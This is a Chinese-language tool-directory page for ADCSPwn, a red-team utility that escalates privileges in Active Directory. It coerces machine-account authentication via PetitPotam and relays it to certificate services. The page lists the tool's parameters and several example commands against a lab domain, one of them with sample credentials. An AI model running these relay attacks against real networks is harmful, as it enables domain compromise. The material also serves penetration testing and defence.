Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ADCSPwn — 一款用于在活动目录网络中进行权限提升的工具,通过强制机器账户进行身份验证并将其中继到证书服务。 | Kitploit
工具/GitHubGitHub/bats3c/adcspwn
权限提升漏洞利用渗透测试身份验证红队
GitHubbats3c/adcspwn

ADCSPwn

一款用于在活动目录网络中进行权限提升的工具,通过强制机器账户进行身份验证并将其中继到证书服务。

查看仓库
87812735年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ADCSPwn

一种通过在活动目录网络中强制从机器账户进行身份验证(Petitpotam)并将其中继到证书服务以提升权限的工具。

使用方法

在目标网络上运行 ADCSPwn。

root@kitploit:~
Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik -  TrustedSec
Contributor: @424f424f -  Black Hills Information Security

adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]

必需参数:
adcs            -       要进行身份验证中继的 AD CS 服务器地址。

可选参数:
secure          -       对证书服务使用 HTTPS。
port            -       ADCSPwn 监听的端口。
remote          -       触发身份验证的远程计算机。
username        -       非域环境下的用户名。
password        -       非域环境下的密码。
dc              -       用于查询证书模板的域控制器(LDAP)。
unc             -       为 EfsRpcOpenFileRaw (Petitpotam) 设置自定义 UNC 回调路径。
output          -       存储 base64 生成的证书文件的输出路径。

使用示例:
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --secure
adcspwn.exe --adcs cs.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share

致谢

  • @harmj0y 和 @tifkin_ 提供了详细描述此问题的白皮书。
  • @topotam77 展示了如何滥用 EfsRpcOpenFileRaw。
下载工具